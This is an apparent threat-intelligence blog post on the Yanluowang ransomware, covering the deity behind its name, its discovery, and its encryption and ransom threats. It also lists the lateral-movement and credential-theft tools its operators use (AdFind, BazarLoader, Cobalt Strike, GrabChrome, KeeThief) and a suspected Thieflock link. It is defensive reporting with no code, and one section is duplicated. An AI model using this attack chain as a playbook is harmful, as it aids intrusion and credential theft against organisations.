Who is Yanluo Wang
Yanluo Wang is a Chinese religion deity and one of the official judge in Youdu or underworld. According to legend, he is often equated with Yama (Buddhism), but actually, Yanluo Wang has his own number of stories and long been worshiped in China. He is always depicted as male and has a brush and a book listing the Death date for everyone.
Yanluo wang ransomware discovery
Researchers have discovered a newly developed ransomware variant called Yanluowang, the ransomware targets high-profile enterprise Yanluowang ransomware was discovered during an incident involving an unnamed large organization after detecting suspicious activity involving the legitimate AdFind command line Active Directory query tool. Threat actors commonly use AdFind to perform reconnaissance operations including accessing information needed to move throughout their victims’ networks.
How Yanluo wang ransomware works
The attackers attempted to deploy their ransomware payloads across the breached organization’s systems within days of the researchers discovering the suspicious AdFind tool. Before deploying the ransomware on compromised devices, the threat operators would implement a malicious tool to perform the following actions:
- Creates a .txt file with the number of remote machines to check in the command line
- Uses Windows Management Instrumentation (WMI) to get a list of processes running on the remote machines listed in the .txt file
How Yanluo wang ransomware works
The attackers attempted to deploy their ransomware payloads across the breached organization’s systems within days of the researchers discovering the suspicious AdFind tool. Before deploying the ransomware on compromised devices, the threat operators would implement a malicious tool to perform the following actions:
- Creates a .txt file with the number of remote machines to check in the command line
- Uses Windows Management Instrumentation (WMI) to get a list of processes running on the remote machines listed in the .txt file
- Logs all processes and remote machines names to processes.txt
Once the malicious tool is deployed, the ransomware will halt the hypervisor virtual machine, end the precursor tool (including SQL and Veeam) harvesting process and encrypt files using the “.yanluowang” extension. Yanluowang group would leave a README.txt ransom note on the encrypted system warning victims not to contact law enforcement or ransomware negotiation companies
Lateral Movement
In most cases, PowerShell is used to download tools to compromised systems including BazarLoader to assist in reconnaissance. The attackers then enable RDP via registry to enable remote access. After gaining initial access, the attackers usually deploy ConnectWise (formerly known as ScreenConnect), a legitimate remote access tool.
In order to perform lateral movement and identify systems of interest, such as the victim’s Active Directory server, the attackers deploy Adfind, a free tool that can be used to query Active Directory, and SoftPerfect Network Scanner (netscan.exe), a publicly available tool used for discovery of hostnames and network services.
The next phase of the attack is credential theft and the attackers use a wide range of credential-stealing tools, including:
- GrabFF: A tool that can dump passwords from Firefox
- GrabChrome: A tool that can dump passwords from Chrome
- BrowserPassView: A tool that can dump passwords from Internet Explorer and a number of other browsers
Along with these tools, the attackers also use a number of open-source tools such as KeeThief, a PowerShell script to copy the master key from KeePass. In some cases, customized versions of open-source credential-dumping tools were also observed (secretsdump.exe). Credentials were also dumped from the registry.
In addition, the attackers have also used a number of other data capture tools, including a screen capture tool and a file exfiltration tool (filegrab.exe). Cobalt Strike Beacon was also deployed against at least one targeted organization.
Other tools used include ProxifierPE, which can be used to proxy connections back to attacker-controlled infrastructure, and the free, Chromium-based Cent web browser.
Threat from Bad actors
“If the attackers’ rules are broken the ransomware operators say they will conduct distributed denial of service (DDoS) attacks against the victim, as well as make ‘calls to employees and business partners’,” the Broadcom researchers added.
“The criminals also threaten to repeat the attack “in a few weeks” and delete the victim’s data,” a common tactic used by most ransomware gangs to pressure their victims into paying the ransom.
Likely Threat actor using Yanluowang
A threat actor previously tied to the Thieflock ransomware operation may now be using the emerging Yanluowang ransomware in a series of attacks against U.S. corporations, researchers have found. The attacker uses a number of tools, tactics, and procedures (TTPs) that were previously linked to Thieflock ransomware attacks, suggesting that they may have been a Thieflock affiliate who shifted allegiances to the new Yanluowang ransomware family.
The attackers have been heavily focused on organizations in the financial sector but have also targeted companies in the manufacturing, IT services, consultancy, and engineering sectors.
There is a tentative link between these Yanluowang attacks and older attacks involving Thieflock, ransomware-as-a-service developed by the Canthroid (aka Fivehands) group. Several TTPs used by these attackers overlap with TTPs used in Thieflock attacks, including:
- Use of custom password recovery tools such as GrabFF and other open-source password dumping tools
- Use of open-source network scanning tools (SoftPerfect Network Scanner)
- Use of free browsers, such as s3browser and Cent browser
This link begs the question of whether Yanluowang was developed by Canthroid. However, analysis of Yanluowang and Thieflock does not provide any evidence of shared authorship. Instead, the most likely hypothesis is that these Yanluowang attacks may be carried out by a former Thieflock affiliate.
